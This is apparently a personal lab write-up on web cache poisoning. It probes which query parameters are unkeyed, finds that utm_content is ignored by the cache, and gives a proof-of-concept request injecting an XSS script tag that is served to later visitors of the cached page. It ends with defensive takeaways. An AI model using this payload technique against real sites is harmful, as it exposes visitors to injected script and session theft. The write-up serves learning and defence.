Note(Datetime, Name) : 2025-04-27 Web cache poisoning via an unkeyed query parameter

Metodelogy

1. Investigate the system to retrieve a list of features
2. Discribe the feature and explain how it works
3. List possible vulnerabilities and group by feature
4. Proof of concept for possible vulnerabilities
5. What is the impact of the vulnerabilities after the proof of concept ?

==========================================================================================================

feature:

1. access GET / -> page is cache

steps taken:

1. access GET /?test=value -> cache is miss
2. access GET /?%20test=value -> cache is miss
3. access GET /?test=value%20t -> cache is miss
4. access GET /?test=value&test -> cache is miss
5. access GET /?#tet -> cache is miss
6. access GET /?postId=4&test=test&test=2&test=4&test=5%23test?test:test?test==test&test&test=test6 -> cache miss
7. access GET /?utm_source=google -> cache is miss
8. access GET /?utm_source=googl -> cache is miss
9. access GET /?utm_medium=cpc -> cache is miss
10. access GET /?utm_campaign=spring_sale -> cache is miss
11. access GET /?utm_term=test -> cache is miss
12. access GET / -> cache is hit
13. access GET /?utm_content=test -> cache is hit -> indicate utm_content parameter is unkeyed cache

vulnerabilities :

1. web cache deception in UTM analytics

Proof of concept:

1. access the URL: GET /?utm_content=test'%3E%3Cscript%3Ealert(1)%3C/script%3E%3C and ensure that the page is cached by the server
2. wait for victim to access the URL: GET / and the injected javacript will executre on the victim's page when they visit the cache page

impact

1. attacker can inject malicious javascript to the cache page, which execute when other user access the cache content, potentially leading to XSS attack

takeaways

1. Ensure all key parametes (including UTM parameters ) are part of the cache key to prevent cache poisoning
2. Regularly test cache key configurations to avoid serving malicious content to users